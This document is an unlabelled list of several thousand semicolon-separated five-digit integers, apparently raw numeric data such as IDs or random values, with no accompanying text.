27074;53673;33403;36978;48753;17605;47634;11243;35733;50593;12747;39823;53263;13344;63068;56264;15938;12838;53988;12370;66671;44442;41748;20982;37035;11184;12278;28053;38454;17399;59999;44085;61557;46826;47101;43772;65744;26139;37593;23699;16191;35460;64343;43496;44054;57604;37341;46291;57655;44334;20859;48305;47587;56265;15776;51498;63106;14224;27894;56496;62453;21630;63444;28014;15703;56615;52631;57488;44970;35308;30549;25992;43663;32296;56154;15724;20672;55863;48686;35817;64766;12724;15948;59645;63628;52614;14831;38232;29280;21786;61412;40069;63846;45043;45925;17835;14435;13357;10386;18717;15959;65021;44195;10829;36881;40643;49813;55151;44262;44568;10771;45729;22260;42076;43452;32291;31890;63842;47281;50870;34450;15185;46403;35721;62162;35658;38705;25826;55612;52178;40142;21426;17373;20466;62918;27477;35251;35684;23865;47168;26950;43562;37301;59896;21488;12449;22748;20821;20221;55563;61878;25048;54340;48866;66475;59861;13277;14654;22577;22607;32899;15745;66593;53845;42280;44854;19942;64915;14603;62343;50832;12995;27963;54154;17140;62416;60108;21902;57395;20422;14192;52276;25331;23383;13238;36282;23305;55394;49522;42526;45292;18037;30614;55061;54990;19684;36752;45512;32528;21485;17280;11114;21612;33156;18451;14110;49781;19115;27795;64643;42685;34760;45801;39901;52214;21046;24396;62733;28559;41187;22692;14396;16032;62200;34581;11043;19522;35441;62278;24684;64213;18652;42429;39485;42055;29325;28814;19491;21732;24639;54984;19580;52336;15548;17016;53346;65378;52369;10435;32431;48623;11007;48566;63188;44348;37314;19103;57949;24522;38508;27008;62927;57212;60504;54459;18363;48532;43000;10945;25350;42834;51101;66298;47870;28813;11355;31535;46480;32949;54164;55560;35883;27822;62971;26885;34915;37602;55824;61078;45053;28821;52859;54167;36338;30513;52974;10411;14508;29018;36571;66902;30225;38937;66099;62919;63132;39105;37047;50727;47117;15148;55673;36336;18460;43709;35352;65109;24449;64891;63711;54899;60673;20832;66323;31543;30909;27514;36048;52731;24697;43475;31185;61410;16584;64558;53217;65492;45883;51048;30404;25338;59849;34166;26308;31600;60728;61944;46789;39378;10572;56020;37360;27981;51986;15111;49838;62986;40846;35052;58611;21484;47393;62436;44394;48952;45727;65122;18321;57883;54422;53807;12808;28419;21043;57007;16961;14742;31009;19696;60558;62742;22612;15233;12975;11652;41224;22554;21955;59185;46844;60548;34410;27721;42461;38498;29354;58827;13370;36408;59991;23409;42340;58212;56619;44893;35250;13758;50109;35223;36385;47326;42331;50910;16588;45903;65612;40860;56307;28279;11000;36894;18376;39084;16900;16966;50344;20813;54463;23144;40719;25264;16861;13751;38668;18115;57628;19430;24367;17127;56579;55580;24212;58253;28634;52257;66592;19419;35057;41823;42325;45538;60194;26189;48870;35760;63270;47719;40751;11398;47481;32020;66257;52918;45327;11788;44692;28445;19693;18661;15435;59734;54792;29183;33531;30978;29558;52976;23076;28689;12658;12380;49310;17543;60956;54017;16814;63283;40716;66867;30457;35340;19692;25857;27267;63135;17711;43250;12614;22742;36854;14373;60454;46805;50548;63346;16820;31584;26841;45669;36333;40137;48606;30218;30911;54281;64694;38286;22214;26716;44835;44203;20273;28008;22615;62526;19487;65899;50604;36151;32249;46188;64869;33014;55868;32628;56514;66048;48318;64138;18809;14868;57578;52271;23313;17661;57533;51438;15099;64879;22690;55611;13457;55153;24746;66590;64806;53745;19872;14819;15052;19540;22902;40429;57624;55968;31244;43371;42604;21098;16342;43408;35508;15211;13205;58933;16417;11024;64438;42301;14086;19404;19164;53912;30719;37516;40748;20369;41604;33555;53509;53949;66310;38132;30752;45193;46583;18613;56628;38666;34667;42054;65571;23052;62804;61066;57674;44324;36047;19647;34887;30151;13567;23541;50373;55452;40158;27757;35937;37495;31955;27115;13860;36560;61581;28677;27176;13975;10249;61452;26198;59033;36215;35476;11041;21794;33107;48921;40249;41025;33862;56899;23798;31531;36272;11264;29852;34545;54389;13414;64972;61949;21537;58061;56955;65333;25500;16149;12665;36066;66235;32631;15853;20236;52984;53161;20238;16566;50001;21289;12555;41847;55839;19523;40141;22757;18361;30863;57160;41093;60323;63236;60511;11565;63767;37371;64811;30784;27525;35694;66840;13348;25730;32549;32556;16754;21230;48739;31902;15017;37274;14047;40895;50153;16736;46882;18140;43851;62077;58277;10387;26092;18520;51056;34170;28483;38532;12402;44668;15217;18053;47390;16097;40812;60905;56765;52289;53336;35616;33214;16350;54693;36669;38726;31820;41524;51726;44996;59471;32761;62233;36305;36415;17672;62002;48409;39945;65262;44350;53931;46200;62594;26169;21313;50074;33998;23676;58056;23593;46027;15747;52522;53627;43564;19850;57115;25834;62557;21109;17766;17107;30862;45326;60593;23681;11137;19628;55507;35205;35959;14807;33480;23015;58467;29153;52986;40960;39613;38274;53681;56541;19365;46073;55469;34652;29104;40902;57443;41527;20930;13343;39019;66524;39147;29593;17687;62352;54385;44524;22780;46631;28100;51714;41981;64199;39957;28721;35744;34991;26766;20879;32413;25943;25692;40001;28951;31290;28944;62787;40066;40016;48541;62607;42820;59954;30026;22155;31339;27961;37337;53667;31572;29667;63162;37355;62913;63408;43945;39306;21458;64319;26547;12526;45255;13003;31919;42385;24246;63999;26704;25248;22563;26726;66526;59922;64321;14284;20026;51546;47819;65491;43835;65147;55401;56978;48157;25813;55974;10794;28401;60184;14011;17638;16206;63142;21029;60231;18079;50503;43343;17561;33391;30082;37863;30546;50027;29353;10711;64857;15827;15869;66504;47198;21917;14195;23379;46461;15057;16902;23271;53784;31847;64914;50066;29404;16525;45276;56313;13336;37814;63501;13640;48914;65776;56304;21759;47333;39563;33732;28402;48947;12318;11415;12886;54607;44991;28127;48389;61871;44052;44537;40217;54619;35715;51493;35333;60439;34442;31253;51162;49715;13188;41485;64535;28906;46630;22669;35318;56259;42282;37176;30219;33904;61890;21963;13960;50898;31382;17746;17372;61396;17120;37856;63268;30562;54944;25670;65349;37304;49916;44775;45373;61072;66108;49021;50621;16125;36046;24762;29802;41933;17161;48745;66486;34703;44646;13729;51263;19736;41978;38292;52184;21415;26394;52058;31200;66456;12522;46154;41061;24585;58197;20334;13218;17313;46610;16824;33568;30131;33817;42582;27192;39824;53992;57996;40586;62096;51871;49017;44607;35208;40483;25032;21758;10419;48818;49939;52087;53670;12776;64333;41122;14214;34797;49739;34513;32407;66695;42713;32364;61698;15940;50851;57125;36926;32177;12733;41347;26791;49195;65918;31683;40752;53574;59858;40808;52104;17525;56744;11402;61525;60245;15262;52698;59392;15166;44477;28331;30569;33788;57453;10096;18398;57245;41432;60685;47160;12916;60517;13909;20115;50608;50497;15405;12269;53823;17087;13743;21550;35981;31061;55475;28427;19213;40165;14738;45114;37111;56144;19821;61806;36242;18372;22731;24325;34631;36207;37084;13880;63743;31737;25980;38833;15421;32650;36386;45933;64387;22497;21994;42131;26268;43986;66104;41352;55892;62972;62308;47443;20724;31972;57722;25259;16442;23544;24623;63079;51492;17692;19922;22091;34967;10657;18146;59214;50892;18383;16753;10001;64783;59903;12741;38186;24051;22730;37597;65131;51068;22157;35749;62109;58275;56163;54039;56078;28320;18055;58728;23655;52036;12466;19432;48597;27318;37220;44782;24932;34394;40502;52388;66733;53285;53453;29574;51167;10227;46460;56202;40331;16253;11084;13672;54986;44828;21823;60027;62425;16300;30645;26847;58729;35714;59137;31515;46261;11226;47820;21056;15875;25330;45192;51521;52715;58293;11035;15442;32294;25129;61632;61608;54639;41513;32088;51800;12796;36106;47132;51771;24106;34737;54966;13646;34126;60076;55342;15566;31321;20473;32112;24610;57650;16145;38648;28712;52222;28504;37907;27609;61238;60219;53741;57632;30177;17408;65774;41787;15930;59786;62832;38491;48190;16406;46371;66822;25524;57666;51096;36957;49427;37228;49248;53118;62558;46392;32329;30115;46776;64796;51461;53445;30620;12946;11381;17798;31810;32343;12052;57990;43806;16083;15445;35931;25314;53934;15900;33032;33767;27370;19646;64592;40529;28169;33445;35962;25756;47123;45473;59096;26795;16812;13545;61702;48929;52378;36797;66327;26664;62361;41757;34702;31672;38214;42900;55999;10471;11774;52868;10114;45115;10149;48714;32633;30259;50763;39849;61358;60971;13989;44387;60622;64962;50151;27880;56370;25450;38663;14323;24769;40686;26088;55431;17807;35784;28622;56242;46591;36550;33738;62292;25880;54830;46054;53616;39124;57046;44766;40406;36123;19829;43993;26875;59949;13163;43976;50268;15584;42648;32806;39336;38361;65747;11696;35075;16965;65267;27186;36539;54044;20382;18179;41561;22274;65421;59176;21195;61321;30711;30440;39492;35930;52548;56325;61592;16497;37842;42852;52754;56477;19583;29535;66463;33402;30554;48254;53304;44896;11113;57063;35941;13984;39049;23380;46088;61719;54945;52332;32076;46821;35778;23443;28392;46677;19386;20643;16111;22637;19853;46495;35297;22917;57553;16355;50459;38882;42253;50534;22907;14959;13094;31509;41760;36595;38830;56939;66253;28202;12629;25822;19393;25984;34139;47491;58123;25502;34374;20292;46654;53680;56911;22259;53261;16067;56826;25617;34733;55575;60270;59515;41382;16133;42836;44225;47791;53134;34417;39612;36376;56555;58496;55524;28318;46995;46066;16648;32358;55295;32245;21866;44966;32827;66936;13047;33667;30788;33749;19643;11807;19174;44493;29152;59317;57525;49678;24163;54805;49761;46193;51353;50820;24456;41200;11538;57474;63433;23166;62579;23791;55842;16916;50402;41848;24545;24885;62642;34649;17597;41417;62212;65468;11504;11573;37689;56262;18052;30400;10368;21089;16578;19067;12029;31419;14481;65527;52066;22496;23585;10884;65892;56690;24650;49460;23047;52155;64729;10042;45167;15464;30350;33753;20944;55763;24404;25715;31347;37640;45731;41474;55943;50208;18117;52529;65672;52587;12755;63232;54719;42632;31493;49249;39954;25337;26458;19832;37972;66112;41676;10157;35216;35221;10349;58919;48664;45954;12918;26765;44954;56060;36179;11014;25012;33039;50880;27048;16922;49501;31105;46831;44989;28418;39874;65174;11012;28475;61369;38662;31074;34250;41373;62135;54921;62650;64337;62231;41333;41075;50676;63509;30351;10767;49025;60444;57413;62344;55471;37248;66974;36569;36084;32730;30518;33097;59511;55816;10062;13601;41818;43536;21059;60666;66213;20766;15437;28629;61334;10803;44165;19675;53006;19935;52627;18070;13559;49032;35393;18156;38850;10132;37755;64701;19427;45146;57719;61149;15910;49462;42617;38351;13233;33049;20335;14767;55301;48149;37746;52055;15610;63978;60912;51000;60073;36754;10950;58747;38853;53569;16950;17098;30763;58302;39108;11780;49542;22107;23592;16152;10785;57280;15315;29685;46756;62288;17641;49027;55728;30392;44721;10631;37974;17795;43117;16166;17769;22445;47328;55254;60982;21774;44849;35123;29556;46418;18853;57920;51008;47665;60991;66844;21413;22120;61861;42436;48783;20660;48849;63790;29799;57653;64429;49072;16958;35735;29881;15272;66314;63094;12556;44787;53121;52267;47030;59587;42808;23167;18989;63654;40337;63875;50990;35260;57291;23893;38019;58266;27893;53961;51398;56656;56034;42812;35329;44158;14529;29047;54701;58425;27734;49804;42821;28834;65691;25371;20987;58913;16528;54176;45672;17006;57747;41917;12494;33783;62335;55633;18418;52139;28839;29886;23995;27231;33229;14459;55561;10129;16435;63160;46346;62203;18065;10080;28037;38369;31755;27499;34841;21148;34589;51207;16382;52747;54121;63361;53566;53192;40380;17255;44886;31117;43285;63113;53378;19648;51553;19566;14922;36722;11102;60034;39602;20808;29794;60443;41792;41331;23384;21619;59156;46766;18445;46646;24062;23957;53412;32165;52247;51565;55144;50882;47545;55222;32585;32352;65339;26770;58862;60935;18245;57736;55515;46199;12896;47314;41289;37983;20068;49844;24582;31941;26821;32374;38360;45793;17015;66212;38089;53691;56584;49530;24531;44068;20063;42555;51284;60290;56772;60387;52620;15494;26409;57945;57373;51539;38969;10167;58849;42287;27868;22981;14115;32447;29387;65649;16352;59412;29919;44145;39899;15344;63267;41451;37964;43322;16784;46928;47118;59969;34488;65513;63280;30668;57906;39004;57418;47742;38026;40394;40659;10731;64412;61756;22543;64347;59821;59703;48491;59994;30571;53552;36339;28194;47268;39475;44530;56585;33693;52380;59998;45066;20714;62664;19193;22559;53830;46588;29602;52375;17586;63691;25409;21503;38271;57204;61606;11208;65780;54400;46944;66621;48303;45127;36770;65595;34875;16609;12908;28983;22068;61792;12764;64477;29814;30171;47854;13040;16129;51439;50350;24221;31311;65445;16819;59347;66312;61797;58674;26947;52447;47126;59127;16498;57727;53499;49767;66265;22153;52730;43694;36497;22586;49194;28000;14381;55142;17231;40847;61738;45060;35677;46143;38317;31861;50342;38553;47425;53328;28873;31439;12411;43638;39229;30384;42680;27134;16239;59415;61757;48226;46727;49307;63982;22294;35792;60356;15820;45911;10308;48946;11217;24484;64366;59044;59398;64685;50292;40619;14880;56981;65501;31387;10888;49395;65884;42387;27039;42943;46355;39673;65534;24225;60046;27565;56435;14981;10039;36315;38169;64835;66775;55022;57341;62695;39556;61773;11824;35668;33966;40890;55007;47691;65392;18739;41480;38171;47300;40081;58558;35361;35651;62437;56436;55543;34471;58003;59191;28461;15294;33196;43793;23038;12945;23318;60481;29147;22714;24952;57992;51043;25762;31219;42854;60077;61911;39758;45364;20458;42601;31871;53482;32018;61312;34424;17712;53257;47855;49895;62586;44975;40857;21281;49024;30105;32372;36995;14185;21934;53005;28267;10608;25272;27069;55940;17178;29818;30528;64647;51355;15119;10636;35940;13478;30342;37352;32083;10760;54838;17768;38872;45907;38055;39626;30755;43090;44211;46093;36643;13565;55363;17980;64370;30029;53202;45964;30267;33797;24067;37300;46987;38671;36689;65885;20804;15592;30096;64027;18262;29597;11608;26396;35177;29275;29757;40368;19636;59614;21163;50222;14449;26878;51206;51109;38110;28986;22505;47114;30198;42749;54474;12725;27139;16989;52835;15564;17321;33400;50253;40434;14304;38715;16272;11091;21462;36322;50451;46842;42236;18336;42773;53635;40501;52284;41033;28298;26328;59680;43730;37021;44268;52659;41191;54019;39362;14159;31708;58418;16996;33589;34101;59490;34181;61341;27194;65509;14326;41534;31914;45497;19357;49742;27793;52488;25536;31771;61841;41464;54850;25436;24724;24146;20565;27325;57670;48405;34444;27128;42504;45005;27674;57172;34211;43419;28948;23727;14924;63943;15978;38934;45807;23476;16772;45206;19703;39864;23894;53799;29056;19896;44176;46354;54125;47888;34491;22561;38103;40701;55225;31289;27782;46873;55359;21595;16522;58527;35339;31376;63245;49150;65651;36576;24211;65494;64481;64303;56546;60948;38616;46170;51279;57498;62250;27380;53055;19874;10897;34458;52902;25919;10933;33609;29698;66892;11562;38006;22182;54762;43677;21418;42758;28263;27273;30499;11503;50009;51524;23284;29904;24862;11819;49927;24299;30345;53776;20931;46970;35317;48927;10030;35351;52149;34081;15361;66901;23870;60804;17690;30355;55154;25489;10065;13079;30894;27811;29939;39789;36904;53498;19909;53875;59034;47286;38660;34069;36238;29044;25395;53503;54222;11634;31716;31352;55642;55797;14976;17023;16068;30369;14183;27206;40150;31177;54537;63874;15932;26590;36705;56624;59800;23905;41754;56961;60457;40306;33968;10376;34028;26907;51838;19878;18102;39734;17697;15926;54130;52721;10147;10459;33296;28985;60817;29711;60639;32647;52908;25974;31539;17673;16689;35334;15919;18984;64275;52263;64934;31041;10095;51947;31595;22740;37012;42207;17135;46254;39008;31989;62510;42480;45947;21695;58430;43646;43647;47807;62071;55326;46292;21023;51450;38775;22519;13521;51067;27089;31836;13915;30473;33559;47808;31229;22375;58703;45458;52405;27160;66135;34157;65910;14142;50486;12505;43750;14928;21813;24698;54615;56458;43632;19599;42877;37063;13176;35030;23499;60542;18263;18716;11663;56004;12234;46604;35990;13615;29583;39866;25767;42421;58564;64354;17564;26367;24628;46089;47249;37081;44496;38736;32681;39232;22463;12874;59463;40117;51180;39068;66700;24807;13504;53858;61967;38310;30605;19331;11308;47058;39397;29367;50453;50576;16082;46518;27268;57114;64776;26610;13744;20411;40832;10041;26306;42967;17022;24611;13354;25243;54390;27152;64883;18484;53848;34979;66205;17186;28866;19506;10532;36751;62088;26385;22436;22069;12767;24223;47463;30789;53175;11947;42528;25875;17154;48342;61315;60927;47694;65938;12110;30608;61416;15730;26024;62934;39338;34574;32917;30550;42803;30811;46011;61075;51394;66716;26103;43517;64053;64432;53965;51558;56713;61195;25021;35641;34721;57266;37216;42288;56874;51522;40749;50131;31913;27563;38695;35785;56399;51144;54049;11533;47183;26632;60391;55600;35357;46385;39889;50842;26236;57108;29569;48858;57384;38677;46469;29638;21841;20633;66749;66835;44621;64042;40636;49375;32487;61775;29661;55333;36193;30016;48464;52996;55923;22726;29810;60552;61873;60121;56201;26668;14665;29453;56875;20462;28625;38205;17146;53708;53650;17223;11090;66453;12973;32419;49849;14048;10987;35849;11254;43313;44717;38229;13210;22239;39946;26207;19801;16175;39697;15298;44147;28494;59129;12840;44074;27391;15235;34112;64852;10468;61511;15714;17682;46731;29190;49766;31266;61552;60125;19437;14895;24710;61597;22263;36144;38183;18820;60799;20077;12395;56223;32900;58807;15257;22855;56031;18236;18040;45490;13894;66070;17556;52537;22511;38485;45399;31761;54478;29737;33722;42088;36197;49331;35379;16789;22440;46305;40722;53085;50234;15267;20146;25050;27660;65224;59985;12486;18677;55131;34871;37934;45857;30617;53191;14555;54433;66712;58752;59655;46627;31334;26384;41216;53978;58352;56531;63448;24838;37785;21061;24707;22982;26364;26307;33869;15782;62132;33194;46526;47824;61180;59548;12831;16131;55614;39038;24499;64004;19546;48325;65956;61199;13194;25452;34207;46035;26502;65770;18551;44490;27887;48875;26667;21709;28046;46390;64013;32822;14841;36814;59971;63348;45514;16794;39059;62100;29192;15341;64918;12107;61913;24079;61504;14586;55494;20150;16214;22694;23307;14547;34914;34152;66738;56348;29450;56320;66517;45945;26657;43710;52563;46608;34763;49894;34975;12014;30449;40200;26144;63182;24084;60462;24927;10060;11315;58216;56583;37687;52355;24521;12566;21037;21958;48959;31303;14220;58865;34727;45009;55976;37344;59848;54839;52195;19286;44950;51004;11481;50191;38202;19241;29652;28890;64986;62945;21580;41791;38822;44227;35169;25443;22039;32090;31036;49983;62685;36535;37737;31529;22853;14400;29454;14156;21787;40339;39197;64492;66359;50142;49101;21041;30505;64813;63100;42761;25760;30781;18404;46899;54968;34226;20322;51088;27243;52436;19694;63513;26800;45898;47521;32093;17686;42894;60919;59256;36676;50392;41060;29113;21653;14702;56233;49855;31762;62885;41681;58334;20857;13445;16182;24113;24356;13237;43009;42473;46212;31196;11135;17576;55841;43621;64445;15059;44341;31134;61640;22584;51018;17138;21680;12909;62548;28770;60105;58262;50476;20710;59240;21797;32216;42904;45184;45851;57671;35012;65310;43697;24653;48255;26711;30161;45658;66306;33363;18042;56900;35819;26426;36516;60318;12529;42360;31906;53803;36723;65202;14946;19155;16260;66717;14830;60129;30132;17790;24519;37015;56344;49607;44059;12621;63087;42408;38469;25208;50500;13469;24023;16270;57814;14231;42712;45762;36284;55905;59616;18629;21008;63121;49657;36394;21572;33290;19127;53718;32516;14645;13353;36089;49010;65766;19879;57790;20575;16485;19455;41897;25256;40474;26768;51867;64256;39512;45352;15705;55648;38143;38357;54814;59234;55169;22746;55446;64584;64356;61087;24912;41095;56952;10186;25678;23986;50381;58764;52150;38896;34909;63485;34413;16115;39605;45788;35764;65936;51996;14148;59198;20698;46192;42710;63995;10953;36908;45687;28434;66150;34668;28342;44773;14576;15715;27773;18756;62413;27671;42388;34496;27239;56631;40210;63286;48708;61102;22606;19563;49922;11806;64607;37181;30423;27169;32529;20110;55857;24574;16477;44014;29760;54268;44369;20540;36749;60610;65206;19024;50920;23567;38870;44310;25714;46195;46793;13216;66535;43134;21957;25903;37292;50560;22799;39401;31591;31530;62617;20191;11265;21374;21616;13626;44080;57254;25442;26322;63474;51349;13669;44431;17747;53906;65503;56358;32932;51825;57137;55038;29676;41839;39203;24774;41396;53375;32309;21725;28787;66713;11361;27712;20619;56831;47493;20955;65247;16792;18509;13358;10165;31652;61406;40407;31924;63350;52261;60390;62261;53477;37244;26616;15181;31881;24191;25716;47501;61649;39846;21964;60636;14242;31895;25953;54896;65801;39211;37197;48611;65238;17443;64598;45835;62366;14389;42270;32253;55164;43597;32683;30419;43339;66230;17469;64088;12334;64943;58126;13522;38398;16158;18158;49167;24168;34843;47785;28162;27195;66847;51766;47743;61966;39343;51280;60201;52199;38359;22067;57909;26506;39389;49244;30387;31828;12753;50351;23931;19131;28365;16187;33614;61322;54188;47795;42197;10131;17614;30714;47235;56412;41882;28727;41971;21557;39804;11105;23632;16537;23935;66437;18235;32135;47492;20664;47750;33022;53494;61732;35527;38024;24861;36714;50155;16020;52797;61359;30306;44814;42391;57969;11900;30872;62806;13526;16017;40907;50060;55819;65775;54629;25927;61565;65103;12559;14564;41836;34340;48258;65146;64205;29670;20153;54785;24387;48842;31308;30871;63111;48406;30122;27980;50300;18625;20578;32147;38458;25886;29518;10342;20902;40717;64894;12442;25632;39949;22666;50895;48633;52871;51054;23345;25282;29269;25958;15285;11414;53970;52442;44739;62164;23973;62993;40776;26740;65807;49992;12676;37548;13468;20734;60764;19663;41654;39332;55898;58918;33576;41574;36344;10315;61807;46567;17411;37643;40073;66090;30241;12260;49354;58276;49092;23734;21838;28063;55554;23139;48341;32894;25801;56598;58384;40854;10281;50957;43823;39986;37131;23147;25663;63836;43167;12801;60309;11616;29455;46868;20693;15237;27277;23217;52941;63366;64290;65417;38788;47474;34973;53779;38175;17263;58474;61609;39642;50038;54898;45409;58615;35712;15908;55713;42343;34666;31313;63634;48757;62632;63644;58321;23546;42046;25638;56910;46191;19622;62068;41020;17381;13732;15694;32282;57372;39327;66710;42018;60029;38911;32450;18802;35956;10155;23382;37879;20060;22255;56117;66434;16461;23021;23029;16041;52061;21439;50162;33367;57703;46818;27126;45659;21566;49517;54813;10351;33116;12547;50606;65928;56314;23991;33204;31789;65736;49053;62845;51422;59131;26882;20378;47825;52228;45730;33096;54317;43314;42371;34834;34455;61635;51648;34474;48242;52520;58254;36177;61812;34438;66317;18511;23856;18576;45317;37599;12564;12816;53402;22806;59263;34297;34313;24476;59307;62893;49716;42427;19400;62483;56246;36233;25288;31806;66143;48423;30120;59242;65620;64237;44093;57519;42566;46123;38991;38799;26613;21080;50522;42565;47339;58997;23039;23425;55871;28785;13679;29830;41881;20332;46095;42636;58447;54008;25661;18725;50682;43221;49080;58907;51712;48799;46754;34693;14898;10309;31815;41622;28843;50627;32456;29773;28403;18020;21741;22681;46710;46233;53941;33228;53648;61519;66637;34269;42366;21690;57963;45854;25480;52373;65954;55703;15273;25883;38056;10918;25228;30277;18356;58585;35456;64239;61503;56740;56039;37892;11169;61418;49378;30036;42702;29650;27247;13662;11940;39404;64765;37808;54982;31011;46549;19157;40204;63090;58141;48673;38743;16039;43644;48395;23964;59775;51259;35124;54424;52325;19244;33965;19402;50809;39903;60161;31281;27112;33557;23694;16757;54951;52210;51835;14412;49062;64197;56867;63362;31501;65856;56003;12895;64362;56832;47289;48240;50539;61409;59423;58911;32539;10202;44732;24410;49912;33153;13060;24116;13339;60902;64327;65522;31685;23099;58180;61918;44193;50457;25066;49915;60196;17558;59099;13396;22383;39490;55867;63537;53235;45254;16174;33739;16089;13854;65414;63284;33600;39929;13848;45802;61065;21395;21663;56042;13390;36019;34487;35451;14398;20552;31116;53497;35296;18296;62347;43860;54398;61125;49800;52935;11942;32226;41226;28609;32557;49546;33727;54501;61745;59200;39654;53308;24231;26621;13076;11354;30628;36134;22765;45062;22501;17017;56257;12028;52515;20283;25057;24227;14307;19275;43685;54965;61644;17473;39906;55149;43959;22099;23756;37151;18611;65398;34169;36453;25019;25177;11167;23531;14575;40866;24365;49946;41303;57846;22253;64982;22199;39029;22432;55362;34432;62193;50812;14017;16708;11837;55539;53798;59260;63783;64202;65579;66316;66821;58780;41371;25989;20775;55487;42725;17607;52561;18375;40850;48919;16526;64785;62383;36142;43595;42384;53305;52799;28973;54148;65886;53247;60933;26354;47215;27296;20424;31184;50028;37526;21115;31119;32661;16547;52200;65448;52834;48495;56273;39806;57452;40426;31261;44811;15221;53086;36221;27621;21945;42002;59011;44697;28156;49161;43319;56959;57398;33092;49206;11281;45226;42128;26096;19086;53772;64430;39659;19366;43592;28818;31607;58990;44478;59046;12890;53009;58654;37767;14540;23016;53332;33438;58839;19172;63944;54855;28149;39177;35266;48145;39895;12347;23783;48289;23984;27882;56617;14789;24260;41816;32897;25837;31680;66318;10343;53856;40460;64395;37820;48353;11560;38217;38431;18516;49118;55667;22150;43194;63228;10187;61652;17394;59609;27529;56950;36011;57090;30297;27694;58440;48980;47684;13823;55209;43863;20742;19854;46030;11522;58205;65260;18969;32153;50599;10612;41249;65158;58146;60788;49899;21182;16672;13030;18861;58142;47343;14167;49650;30354;57873;10831;54667;36728;33919;20200;43499;64087;29582;64207;62245;11482;30382;44492;42849;42328;59233;51319;61932;25254;38468;28163;35894;65943;43922;53546;32865;65073;11061;35411;17200;33360;25890;47726;15022;46161;47582;37412;57256;31195;43238;21495;64534;23406;31551;44702;46673;64323;56894;48925;53461;64067;44520;43465;21047;23917;14251;18931;39376;65797;55606;65372;59725;62377;40446;22741;28826;12927;21730;65113;45069;13122;16178;45149;43630;38022;59057;29909;25247;55223;11983;57705;14431;47010;34065;13804;29511;24542;17390;45140;31383;65734;44913;48710;54671;50629;35994;40119;20118;57521;57199;51150;12117;28917;28062;22926;65137;60160;63425;59619;52453;52710;30540;18043;35801;62568;40227;45794;66251;28697;54732;28932;62710;64399;13140;64854;57043;39926;29706;36230;48961;10928;15956;12368;44089;65225;20483;27866;49435;37294;46432;31887;46991;55585;34895;52804;53138;34729;49985;63578;27663;41405;13415;26804;44361;23046;16582;31715;25462;19828;21672;56342;42975;17598;40498;66062;57966;19851;26604;26662;44397;46270;16823;53342;19452;33369;14458;23515;14448;59313;27546;42783;64341;39515;65363;18566;39173;55831;45154;10777;14050;38904;31763;62304;19185;20784;49031;41528;54303;28498;63300;18024;37784;56083;60087;55454;30568;39870;47442;25792;34342;41939;63065;11842;51073;26748;45869;38759;28389;32804;55132;34799;47483;15188;14729;34245;49008;52496;51465;16426;26572;48430;64885;66642;57950;30293;25957;46988;50609;18917;51277;42988;26663;13648;35561;64786;41955;11660;59494;30309;35237;42289;49240;51637;28704;15198;32370;10797;15027;48816;24091;65545;51007;60980;27687;62659;60346;19836;11433;31197;20009;64740;27589;52042;42578;30961;40321;20512;42350;19472;52078;42333;38733;15658;13421;34236;11990;59190;47344;57222;26672;58279;30078;33651;52265;19631;30321;22389;66193;39276;23375;17425;21847;30490;41132;65694;13660;56599;61586;13476;42507;61819;20728;20388;21970;48413;10674;58677;21067;64985;50430;34590;28397;58916;54432;40261;17454;57837;25327;53022;46725;35844;42909;16952;34952;50615;20253;29434;35471;31489;63593;18752;15655;57861;45401;11875;30486;40221;30447;60355;62295;18190;47045;63308;18642;11003;45418;47745;25655;55265;11142;59830;58290;27945;11196;64995;64888;26183;46656;39181;11712;56022;20898;43504;27459;27015;46414;37132;23614;55850;24165;38933;40509;41551;29869;66154;60601;60844;51702;18316;45179;60750;17698;53339;63311;51340;37465;16157;43693;40046;11674;60943;42627;39992;32755;36963;62447;43330;65941;41135;62830;19204;40792;54962;41820;24880;26041;62788;55106;42045;56700;34976;41326;30671;12997;53859;34030;18247;46645;56720;65101;28553;13416;23648;20909;56484;29244;45263;40005;59314;48780;50361;32459;52028;64499;54992;55624;10686;16114;21640;11744;32003;35551;31131;54464;43118;45845;66072;19294;64818;27542;10074;63912;16337;26681;12258;44587;28137;54647;39777;57065;28449;57397;31333;32920;44311;25784;63186;61946;57195;41786;33565;14769;32801;36057;21997;63524;56143;20277;49693;53087;56118;40919;58397;25961;28631;54156;42611;53125;21558;14149;36817;61801;31786;63246;11811;25240;26517;38992;26042;56983;22405;51258;55513;62962;66187;45079;53740;28338;31096;52164;31420;47017;37632;44184;27373;10641;39759;38761;12039;58628;29772;37378;42081;29660;32595;64375;34891;45453;15039;51421;59719;19238;45432;64887;25567;44819;27001;60445;63881;63329;54211;23533;65011;43943;33427;15406;56669;65427;32707;45693;25928;33905;62243;18206;48675;59271;62367;35812;32662;61454;10257;41924;40480;27407;51756;58326;20534;15203;43837;35822;45689;55895;27504;21988;65981;63892;34275;66745;27292;10480;45663;51957;39735;16225;42721;36954;57438;25439;36583;15947;62839;59512;42757;34685;11787;15522;52209;51912;29010;22409;58905;58699;28993;55435;39687;36180;63359;34996;55453;15880;62798;32473;44598;51013;38856;14140;51664;17753;26698;10870;11581;30311;40815;66530;44546;13177;31391;17992;23140;61799;25713;30266;22397;22682;14947;29011;53677;60273;27832;36255;58415;46315;37588;57753;18517;41530;57247;61992;16473;26259;49098;40041;52126;39260;39933;42830;56056;41005;61877;59966;59407;34532;55818;49910;45960;41099;38289;63607;11266;49745;31947;10327;19625;18387;32856;16891;33660;26633;46474;11556;63041;14473;31730;39187;44239;47337;16727;34596;62402;52395;44594;35984;24726;54938;44051;65792;12999;51981;61516;34113;16341;44159;24947;21015;45686;20752;47367;26388;59327;26614;58846;41034;38810;51636;36007;38769;43957;47649;23148;14525;32769;55051;48997;54682;50714;57569;34252;50168;30053;50519;40236;19519;39387;18394;24439;44889;36086;37883;53890;62136;22894;27640;54357;57253;29724;62822;22851;65999;23989;66381;38727;11557;18118;48391;62327;42294;17628;49463;56354;47299;34558;13426;34901;13973;21119;34573;29472;49792;48749;15460;43682;50477;63431;60945;51705;15713;66459;13623;49924;39950;32844;29107;39079;36139;32759;31827;16647;57796;50425;25322;46194;32725;33770;13110;61555;20694;58857;30929;64183;20849;29626;37667;11067;23615;32944;39058;40923;23849;65696;58345;63149;62744;54194;54881;21352;59207;58426;50646;38263;34517;22342;12853;23837;65080;66293;44144;44491;64281;65535;61904;60164;43141;18259;59231;44612;42993;10600;55107;39412;24300;26405;66522;60118;29623;22634;27103;52997;14100;42232;18624;64172;58004;44259;64874;10910;48581;30197;56829;44280;39292;57017;44512;40905;43807;15040;29111;37194;53340;58637;28812;60968;36718;19805;61737;62675;42976;23253;33072;61156;24781;12929;40877;38044;61480;65203;38629;14347;39647;11283;11574;23577;44797;58396;21621;19339;63771;50653;